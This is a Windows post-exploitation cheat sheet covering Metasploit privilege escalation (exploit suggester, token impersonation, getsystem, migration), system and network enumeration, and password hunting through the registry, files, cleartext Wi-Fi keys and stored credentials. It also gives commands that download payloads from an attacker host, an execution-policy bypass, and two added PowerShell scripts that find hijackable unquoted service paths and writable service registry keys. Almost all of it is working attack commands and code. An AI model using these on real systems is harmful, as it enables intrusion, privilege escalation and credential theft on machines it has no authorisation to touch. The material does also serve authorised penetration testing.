
Windows (Post-Exploitation)

Metasploit Shell

Local Exploit Suggester:

*background the current Meterpreter session first: background

{
use post/multi/recon/local_exploit_suggester
set session x
run
}

*the suggester only ranks candidates from OS version, patch level and architecture; each exploit still has to be run (most have their own check) before it is trusted

*after finding a valid exploit

{
use exploit/…
set session x
set lport xxxx
set lhost x.x.x.x
run
}

Get User: getuid

Get Shell: shell

Grab tokens with incognito: {
load incognito
list_tokens -u
impersonate_token "<TOKEN>"
}

*list_tokens needs -u (user tokens) or -g (group tokens); write the token as DOMAIN\\user, with the backslash escaped

Try to Auto-Elevate: getsystem

Migrate to Process: migrate -N <process.exe>

*migrate takes -N <name> or -P <pid>; pick a long-lived process running as the same user (or as SYSTEM once getsystem has worked)

System Info

Basic System Info: systeminfo

Show System Patches: wmic qfe

List Drives: wmic logicaldisk

List Drivers: driverquery

Show All Users: net user

Show Current User: whoami

Show Current User Privs: whoami /priv

Show Current User Groups: whoami /groups

Info On Specific User: net user <user>

Local Groups: net localgroup

Users In A Local Group: net localgroup <group>

Check Processes Status: ps (Meterpreter; tasklist from cmd)

Check Scheduled Tasks: schtasks /query /fo LIST /v

List Services (state, PID, path): wmic service list brief

Check Service Permissions (SDDL): sc sdshow <service>

Check for Unquoted Service Paths: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

*wmic is deprecated and not installed by default on the newest Windows builds; Get-CimInstance Win32_Service and Get-HotFix are the PowerShell equivalents
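
The wmic one-liner only lists candidates. The script below is an added example (not from the original cheat sheet) that goes one step further: for every auto-start service with an unquoted path containing a space it lists the shorter paths Windows will try first, and tests whether the current user can actually write into each of those directories. It assumes Windows PowerShell 5.1 or later on the target; all service names come from the host, nothing is hard-coded.

```powershell
# Added example, not from the original cheat sheet. Assumes Windows
# PowerShell 5.1+ on the target.

function Test-WritableDirectory {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    # Probe by creating and deleting a file: this honours deny ACEs and
    # inheritance without parsing the DACL, but it does touch the disk.
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service |
        Where-Object {
            $_.StartMode -eq 'Auto' -and
            $_.PathName -and
            $_.PathName -notmatch '^"' -and            # quoted paths are not affected
            $_.PathName -notlike 'C:\Windows\*' -and   # same filter as the wmic one-liner
            $_.PathName -match '\s'
        } |
        ForEach-Object {
            $svc = $_
            # Drop trailing arguments: keep everything up to the first ".exe".
            $exe = if ($svc.PathName -match '^(.*?\.exe)') { $Matches[1] } else { $svc.PathName }
            $parts = $exe -split ' '
            # C:\Program Files\My App\svc.exe is tried as C:\Program.exe and then
            # C:\Program Files\My.exe before the real binary is reached.
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path -Path $candidate -Parent
                [pscustomobject]@{
                    Service     = $svc.Name
                    RunsAs      = $svc.StartName
                    ServicePath = $svc.PathName
                    Hijack      = $candidate
                    Writable    = Test-WritableDirectory -Path $dir
                }
            }
        }
}

# Only rows with Writable = True are worth a closer look.
Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

A writable hijack location is only half the story: the service has to be restarted (sc stop/sc start, which needs rights on the service) or the box rebooted before the dropped binary runs, and RunsAs tells you which account you would end up with. The write probe leaves a short-lived file behind on each directory it tests, so skip it where that noise matters.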

Networking

Simple Network Info: ipconfig

Advanced Network Info: ipconfig /all

Arp Table: arp -a

Route Table: route print

Netstat Ports: netstat /ano

List Saved Wifi Profiles (SSIDs): netsh wlan show profile

Password Hunting

Search For String: findstr /si <string> *.txt *.<filetype>

Search For File: dir /s fileName*

Search In Registry (HKLM): reg query HKLM /f password /t REG_SZ /s

Search In Registry (HKCU): reg query HKCU /f password /t REG_SZ /s

Get Wifi Password: netsh wlan show profile <SSID> key=clear

Cat Out File: type <file>

Dir all files in directory (including hidden): dir /a

Show alternate data streams: dir /R

Currently Stored Credentials: cmdkey /list

Check Access To Registry: powershell "Get-Acl -Path HKLM:\System\CurrentControlSet\services\regsvc | fl"

*quote the whole PowerShell command when running it from cmd, otherwise cmd takes the pipe for itself; a service key the current user can write lets you repoint ImagePath, after which the service has to be restarted (or the box rebooted)
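
Reading one key's ACL by eye does not scale. The script below is an added example (not from the original cheat sheet) that runs the same Get-Acl check over every service key under HKLM\SYSTEM\CurrentControlSet\Services and keeps only the Allow entries that give the current token real write rights. It assumes Windows PowerShell 5.1 or later; the user and group SIDs are read from the current token, so nothing host-specific is hard-coded.

```powershell
# Added example, not from the original cheat sheet. Assumes Windows
# PowerShell 5.1+ on the target.

function Get-WritableServiceKey {
    $token  = [Security.Principal.WindowsIdentity]::GetCurrent()
    # The user's own SID plus every group SID carried by the token.
    $mySids = @($token.User.Value) + @($token.Groups | ForEach-Object { $_.Value })

    # Only rights that let us change the key matter. WriteKey and ReadKey are
    # deliberately not used: both are composites whose read bits overlap, so a
    # bitwise test against them would flag read-only ACEs.
    $writeBits = [Security.AccessControl.RegistryRights]::SetValue -bor
                 [Security.AccessControl.RegistryRights]::CreateSubKey -bor
                 [Security.AccessControl.RegistryRights]::ChangePermissions -bor
                 [Security.AccessControl.RegistryRights]::TakeOwnership

    Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $key = $_
            # Keys we cannot even read the DACL of are skipped.
            try { $acl = Get-Acl -LiteralPath $key.PSPath -ErrorAction Stop } catch { return }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
                catch { continue }
                if ($mySids -notcontains $sid) { continue }
                if (($ace.RegistryRights -band $writeBits) -eq 0) { continue }
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Identity  = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                    ImagePath = (Get-ItemProperty -LiteralPath $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                }
            }
        }
}

Get-WritableServiceKey | Format-Table -AutoSize
```

The check looks at Allow entries only; a matching Deny ACE higher in the DACL would still block the write, so confirm a hit with an actual Set-ItemProperty on a harmless value before relying on it. As with an unquoted path, a rewritten ImagePath only pays off once the service is restarted or the machine rebooted.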

Antivirus and Firewall

Service Control Search: sc query <Antivirus>

Quick Service Control Query: sc queryex type= service

Show Firewall State (1): netsh advfirewall firewall dump

Show Firewall Profiles: netsh advfirewall show allprofiles

Show Firewall Rules: netsh advfirewall firewall show rule name=all

Show Firewall State (2, legacy): netsh firewall show state

Show Firewall Config (legacy): netsh firewall show config

*the netsh firewall context is deprecated since Windows Vista/Server 2008 and missing from newer builds; the advfirewall commands are the ones that still work

Execution and Uploading Payloads

*upload and run files from a folder the current user can write to, e.g. the temp folder or the user's profile: cd C:\Windows\Temp

Powershell Execution Policy Bypass: powershell -ep bypass

Load PowerShell (Meterpreter): load powershell

Download File (certutil): certutil -urlcache -f http://hostip/file file

Download File (wget, PowerShell alias for Invoke-WebRequest): wget -OutFile file http://hostip/file

Download File (curl): curl.exe -o file http://hostip/file

Download File (PowerShell): powershell.exe -Command "Invoke-WebRequest -OutFile ./file http://hostip/file"

*on Windows, wget is not GNU wget but an alias for Invoke-WebRequest, so use -OutFile; -o is ambiguous and fails

Runas: C:\Windows\System32\runas.exe /user:<DOMAIN\user> /savecred "C:\Windows\System32\cmd.exe /c <Command>"

*/savecred only works when a credential for that user is already stored (see cmdkey /list); otherwise runas prompts for the password interactively

Restart PC from PowerShell: restart-computer


Dragon Eye Intelligence LLC
